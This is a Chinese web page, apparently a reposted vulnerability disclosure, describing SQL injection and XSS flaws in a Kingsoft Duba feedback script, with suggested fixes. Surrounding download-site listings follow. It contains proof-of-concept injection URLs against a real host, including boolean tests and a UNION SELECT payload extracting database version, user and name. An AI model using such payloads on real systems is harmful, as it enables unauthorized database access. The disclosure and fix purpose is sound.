金山毒霸多個sql注入及XSS漏洞和修復
第一個
簡要描述:由于變量過濾不嚴產(chǎn)生SQL注入漏洞 可通過入侵手段 拿到站點權限
詳細說明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2
漏洞證明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1
http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2
結果明顯不同 注入漏洞產(chǎn)生
修復方案:過濾變量app
第二個
簡要描述:過濾不嚴導致存在SQL注入
詳細說明:過濾不嚴導致存在SQL注入 有機會拿下服務器權限
漏洞證明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--
http://labs.duba.net/robots.txt
未作進一步測試
修復方案:過濾參數(shù)
第三個:
簡要描述:留言處過濾不嚴 造成跨站漏洞
詳細說明:留言處過濾不嚴 造成跨站漏洞
漏洞證明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5
相關文章

金山毒霸U盤衛(wèi)士 v4.0 綠色版 快速深度檢測U盤真實大小工具
金山U盤衛(wèi)士綠色版是提取自金山毒霸的一款綠色小軟件,它功能強大,專業(yè)且免費為你檢測U盤是不是傳說中的縮水U盤!2013-06-18- 1、自動申請金山毒霸90天通行證 2、解決上一個版本中存在的一些問題 3、程序界面美化 4、VISTA用戶請以管理員身份運行工具 5、程序運行過程中,請不要關閉程序,毒2009-08-18
- 金山毒霸通行證申請精靈2.8 功能: 1.自動申請37/60天金山毒霸通行證 2.操作簡便,易于掌握 3.VISTA操作系統(tǒng)下請使用管理員身份進行運行 4.內(nèi)置了下載金山毒霸和金2008-12-11

金山毒霸2015 新毒霸 悟空 具有防火墻的殺毒軟件 SP2.5 中文官方正式版
金山毒霸2015具有病毒防火墻實時監(jiān)控、壓縮文件查毒、查殺電子郵件病毒等多項先進的功能。2015-07-29
歡迎您使用本軟件,使用前請殺毒,最好是到作者官方站下載, 這樣可能會更安全些,以免遇到不法份子捆 綁了惡意程序對您的機器造成破 壞,2008-12-11- 可以批量獲取NOD32 EAV/ESS 用戶名密碼并且可以使用官方服務器更新病毒庫,6個更新源,可保證高效穩(wěn)定獲取最新的ID密碼。支持將用戶名密碼或通2009-07-03
- 我最近按照金山的提示,更新了金山毒霸獵豹版,這下可不得了了,每天都要提示我被黑客攻擊,已攔截。我看了一下,最多的一天有上百次攔截,這是怎么回事?。?/div> 2011-11-03此工具可自動反復申請90天的金山毒霸通行證,完美支持金山毒霸2009、2008 VISTA系統(tǒng)下,請以系統(tǒng)管理員身份運行工具。在使用時,工具本身不會連接網(wǎng)絡,純綠色、安全,使用2010-01-04

金山毒霸上網(wǎng)保護 搜狗瀏覽器安全插件 V1.1.1.1 中文綠色免費版
金山毒霸上網(wǎng)保護插件,插件具有保護網(wǎng)購安全、攔截欺詐網(wǎng)站、攔截木馬網(wǎng)站等功能,搜狗瀏覽器高速模式插件。用搜狗的朋友可以安裝了。2012-07-30筆記本、上網(wǎng)本、游戲用戶最愛 - 精致界面,完美適配上網(wǎng)本屏幕,安全狀態(tài)一目了然(三種狀態(tài)界面圖略縮圖)- 極速版升級更省流量,適合3G及無線網(wǎng)用戶- 極速版2009-11-11最新評論





